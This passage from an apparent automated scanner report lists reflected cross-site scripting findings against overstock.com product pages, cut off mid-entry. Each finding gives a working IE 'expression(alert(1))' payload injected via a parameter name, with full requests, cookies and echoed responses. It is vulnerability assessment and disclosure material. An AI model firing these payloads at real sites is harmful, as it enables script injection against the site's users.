Server: Apache
Expires: Wed, 10 Nov 2010 16:43:20 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=4107143|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:43:20 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407400835:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:43:20 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=12
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 118909

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Bo
...[SNIP]...
<input type="hidden" name="6beca"style="x:expression(alert(1))"46bb046a4c0" value="1"/>
...[SNIP]...

2.161. http://www.overstock.com/Home-Garden/Buffalo-Tools-Electric-Chain-Saw-Sharpener/4188189/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Buffalo-Tools-Electric-Chain-Saw-Sharpener/4188189/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6080"style%3d"x%3aexpression(alert(1))"7a02a62f1b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d6080"style="x:expression(alert(1))"7a02a62f1b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Buffalo-Tools-Electric-Chain-Saw-Sharpener/4188189/product.html?d6080"style%3d"x%3aexpression(alert(1))"7a02a62f1b8=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:38:52 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:38:53 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:38:53 GMT; Path=/
Set-Cookie: mxcproclicks=4188189|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:38:53 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407132957:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=34
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 105712

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Bu
...[SNIP]...
<input type="hidden" name="d6080"style="x:expression(alert(1))"7a02a62f1b8" value="1"/>
...[SNIP]...

2.162. http://www.overstock.com/Home-Garden/Cabo-Mocha-Microsuede-Sectional-Sofa-Set/4737201/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Cabo-Mocha-Microsuede-Sectional-Sofa-Set/4737201/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c512"style%3d"x%3aexpression(alert(1))"b229728369b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c512"style="x:expression(alert(1))"b229728369b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Cabo-Mocha-Microsuede-Sectional-Sofa-Set/4737201/product.html?2c512"style%3d"x%3aexpression(alert(1))"b229728369b=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 15:49:40 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 15:49:40 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:49:40 GMT; Path=/
Set-Cookie: mxcproclicks=4737201|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:49:40 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404180208:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=47
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108513

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Ca
...[SNIP]...
<input type="hidden" name="2c512"style="x:expression(alert(1))"b229728369b" value="1"/>
...[SNIP]...

2.163. http://www.overstock.com/Home-Garden/Camden-Collection-350-Thread-Count-Egyptian-Cotton-Sheet-Sets/4064078/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Camden-Collection-350-Thread-Count-Egyptian-Cotton-Sheet-Sets/4064078/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f623b"style%3d"x%3aexpression(alert(1))"6c555cb7e50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f623b"style="x:expression(alert(1))"6c555cb7e50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Camden-Collection-350-Thread-Count-Egyptian-Cotton-Sheet-Sets/4064078/product.html?f623b"style%3d"x%3aexpression(alert(1))"6c555cb7e50=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:37:59 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:37:59 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:37:59 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4064078|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:37:59 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407079908:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 124972

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>Ca
...[SNIP]...
<input type="hidden" name="f623b"style="x:expression(alert(1))"6c555cb7e50" value="1"/>
...[SNIP]...

2.164. http://www.overstock.com/Home-Garden/Capri-Print-300-Thread-Count-Duvet-Set/4805795/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Capri-Print-300-Thread-Count-Duvet-Set/4805795/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc64f"style%3d"x%3aexpression(alert(1))"4fbcfd4b8f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc64f"style="x:expression(alert(1))"4fbcfd4b8f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Capri-Print-300-Thread-Count-Duvet-Set/4805795/product.html?fc64f"style%3d"x%3aexpression(alert(1))"4fbcfd4b8f1=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:48:05 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:48:05 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407685271:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:48:05 GMT; Path=/
Set-Cookie: mxcproclicks=4805795|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:48:05 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113301

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Ca
...[SNIP]...
<input type="hidden" name="fc64f"style="x:expression(alert(1))"4fbcfd4b8f1" value="1"/>
...[SNIP]...

2.165. http://www.overstock.com/Home-Garden/Casseria-8-piece-Comforter-Set/3672338/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Casseria-8-piece-Comforter-Set/3672338/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83d3e"style%3d"x%3aexpression(alert(1))"fb885b63000 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 83d3e"style="x:expression(alert(1))"fb885b63000 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Casseria-8-piece-Comforter-Set/3672338/product.html?83d3e"style%3d"x%3aexpression(alert(1))"fb885b63000=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:41:27 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:41:27 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=3672338|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:41:27 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289407287892:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:41:27 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=29
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 114539

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Ca
...[SNIP]...
<input type="hidden" name="83d3e"style="x:expression(alert(1))"fb885b63000" value="1"/>
...[SNIP]...

2.166. http://www.overstock.com/Home-Garden/Chai-Microsuede-Sofa-Bed/1907674/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Chai-Microsuede-Sofa-Bed/1907674/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c63a"style%3d"x%3aexpression(alert(1))"1cfd780e890 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c63a"style="x:expression(alert(1))"1cfd780e890 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Chai-Microsuede-Sofa-Bed/1907674/product.html?3c63a"style%3d"x%3aexpression(alert(1))"1cfd780e890=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:21:10 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:21:10 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:21:10 GMT; Path=/
Set-Cookie: mxcproclicks=1907674|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:21:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406070705:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=26
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 108990

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Ch
...[SNIP]...
<input type="hidden" name="3c63a"style="x:expression(alert(1))"1cfd780e890" value="1"/>
...[SNIP]...

2.167. http://www.overstock.com/Home-Garden/Chrome-3-light-Black-Shade-Crystal-Chandelier/4488456/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/Chrome-3-light-Black-Shade-Crystal-Chandelier/4488456/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66523"style%3d"x%3aexpression(alert(1))"edf649f61ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66523"style="x:expression(alert(1))"edf649f61ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/Chrome-3-light-Black-Shade-Crystal-Chandelier/4488456/product.html?66523"style%3d"x%3aexpression(alert(1))"edf649f61ee=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:29:13 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:29:13 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=4488456|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:29:13 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406553445:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:29:13 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=48
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113205

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j15.overstock.com ssl:false -->


<head>

<title>Ch
...[SNIP]...
<input type="hidden" name="66523"style="x:expression(alert(1))"edf649f61ee" value="1"/>
...[SNIP]...

2.168. http://www.overstock.com/Home-Garden/Chrome-Five-function-Personal-Handheld-Shower-Head/2073900/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
